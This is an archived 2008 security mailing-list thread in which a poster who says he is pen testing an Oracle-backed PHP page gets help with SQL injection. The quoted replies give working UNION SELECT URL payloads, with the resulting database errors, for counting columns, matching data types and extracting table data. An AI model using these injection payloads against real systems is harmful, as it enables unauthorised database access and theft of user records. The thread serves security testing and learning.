From: Clone (c70n3@yahoo.co.in)
Date: Fri Jan 18 2008 - 19:26:52 EST
Thanks Jeff & everyone.
I've moved further after your emails. Really much
appreciated.
With Jeff's input below I enumerate that there are 2
columns.
This time I gave
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
Now I get following error:
ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01790: expression must have same datatype as
corresponding expression in dbs.inc on line 44
The I tried following:
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
And get the error
ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-00911: invalid character in dbs.inc on line 44
The functionality of the page is to generate an email
page/forum email page.
Any idea what's next?
--- jeffrey rivero <jeffr76@yahoo.com> wrote:
> Hello all
> in your Union start by finding out how many columns
> there are
> ie.
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
> would give you 3 columns
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
> would give you 4
> then once you have that
> get the data types
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
> for the first to be a string
> and so on
> then you can start to get real data from the tables
> or
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--
>
> Jeff
>
> Clone wrote:
> > Hey List
> >
> > I am pen testing a web app that supplies sql
> > parameters on the URL something like
> >
> > http://x.y.z.a/item.php?Id=90
> >
> > I did blind sql injection by adding AND 1=1 to
> confirm
> > the vulnerability.
> >
> > Now when I do
> >
> > http://x.y.z.a/item.php?Id=90'
> >
> > I get
> >
> > ociparse() [function.ociparse]: OCIParse:
> ORA-01756:
> > quoted string not properly terminated in item.php
> on
> > line 312
> >
> > Then I tried (after confirming presence of usr
> table
> > name)
> >
> >
>
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
> >
> > and I get the error
> >
> > ociexecute() [function.ociexecute]:
> OCIStmtExecute:
> > ORA-01789: query block has incorrect number of
> result
> > columns in dbs.inc on line 44
> >
> > I know one valid user account in the oracle DB.
> >
> > Any idea what's the best strategy to move forward?
> >
> > I'm not getting any further from here so far.
> >
> > Any advise / helpo would be much appreciated.
> >
> > Cheers'
> >
> >
> >
> > 5, 50, 500, 5000 - Store N number of mails
> in your inbox. Go to
>
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
> >
> >
> >
>
------------------------------------------------------------------------
> > This list is sponsored by: Cenzic
> >
> > Need to secure your web apps NOW?
> > Cenzic finds more, "real" vulnerabilities fast.
> > Click to try it, buy it or download a solution
> FREE today!
> >
> > http://www.cenzic.com/downloads
> >
>
------------------------------------------------------------------------
> >
> >
> >
>
Chat on a cool, new interface. No download required. Go to http://in.messenger.yahoo.com/webmessengerpromo.php
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT